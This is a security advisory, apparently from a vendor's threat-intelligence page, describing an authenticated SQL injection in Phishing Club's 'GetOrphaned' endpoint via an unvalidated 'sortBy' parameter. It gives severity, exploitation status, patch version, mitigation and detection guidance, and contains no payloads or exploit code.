This vulnerability allows an authenticated SQL injection in Phishing Club, a phishing simulation and man-in-the-middle framework. Prior to version 1.30.2, the 'GetOrphaned' recipient listing endpoint constructs a raw SQL query by concatenating a user-controlled 'sortBy' value directly into the ORDER BY clause without proper allowlist validation. An authenticated attacker can exploit this vulnerability to inject malicious SQL expressions into the query.
The CVSS score for this vulnerability is 6.5, indicating a medium severity level. The low attack complexity and the necessity for minimal privileges imply that the risk to organizations includes potential unauthorized access to sensitive database information. Furthermore, the vulnerability has been observed in versions prior to v1.30.2, necessitating immediate attention from organizations using the affected software.
As of the latest reports, there are no known exploits available in the wild for this vulnerability. However, the nature of SQL injection vulnerabilities means that they can be easily exploited if not addressed promptly. Organizations should prioritize patching immediately to mitigate the risks associated with this vulnerability.
Phishing Club released a patch for this vulnerability in version 1.30.2, which includes validation of the order-by column against an allowlist. Organizations that have not yet updated should plan to do so as part of their next patch cycle.
For continued security, organizations must regularly review their application security posture and validate their defenses against such vulnerabilities.
Vulnerability Details
The vulnerability is classified as a SQL injection (CWE-89) that affects the Phishing Club component. Specifically, the issue arises from the handling of user input in SQL queries, which allows unauthorized SQL commands to be executed.
The vulnerability has a CVSS score of 6.5, indicating a medium severity. The attack vector is network-based, and the attack complexity is low, meaning that an attacker could exploit this vulnerability with relative ease given sufficient privileges.
This vulnerability was published on February 26, 2026, and impacts versions prior to 1.30.2. As of now, there are no known public exploits, but organizations should remain vigilant.
Technical Analysis
The root cause of this vulnerability is improper input validation in the SQL query construction process. The 'GetOrphaned' endpoint fails to validate the 'sortBy' parameter against an allowlist, allowing attackers to inject arbitrary SQL commands.
The attack vector is network-based, and the attack complexity is low. Privileges required are low, meaning that an authenticated user can initiate this attack without needing administrative rights. User interaction is not required, increasing the risk profile of this vulnerability.
This vulnerability has significant implications for confidentiality, as successful exploitation could lead to unauthorized data exposure. Integrity and availability impacts are not applicable in this context.
Risk & Impact Analysis
Real-world deployment risk for this vulnerability is substantial. Organizations that use Phishing Club and have not updated to version 1.30.2 are at increased risk of SQL injection attacks that can lead to data breaches. The potential blast radius includes exposure of sensitive data, which can have significant repercussions for affected organizations.
Given the medium severity and the ease of exploitation, organizations should address this vulnerability in their priority patch cycle to minimize potential impacts.
Exploitation Status
Signal | Status |
|---|---|
Known Exploit | No |
Public PoC | No |
Actively Exploited | No |
Ransomware Use | No |
Affected Versions
The affected product is Phishing Club, specifically all versions prior to 1.30.2. Organizations should ensure they upgrade to the latest version to avoid this vulnerability.
Mitigation & Remediation
To remediate this vulnerability, organizations must patch to version 1.30.2 or later of Phishing Club. For those unable to apply the patch immediately, consider implementing input validation to restrict the 'sortBy' parameter to a predefined list of values. Additionally, organizations should conduct regular security audits and penetration testing to identify and mitigate potential vulnerabilities.
For more information on penetration testing services, organizations can refer to penetration testing to enhance their security posture.
Detection Guidance
Organizations should monitor logs for unusual database queries, particularly those involving the 'sortBy' parameter in the 'GetOrphaned' endpoint. Behavioral anomalies in application performance could also indicate attempts to exploit SQL injection vulnerabilities.
AppSecure Threat Intelligence Insight
The long-term significance of this vulnerability lies in the common nature of SQL injection attacks. They represent a persistent threat to applications that improperly handle user input. Security teams should learn from this incident to strengthen their defenses against similar vulnerabilities in the future.
Organizations must develop robust input validation frameworks and conduct regular security training for developers to prevent such vulnerabilities. For further reading on security best practices, consider exploring penetration testing methodology and training resources.
For insights into vulnerability management programs, security teams should review vulnerability management program design to effectively handle emerging threats.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
.webp)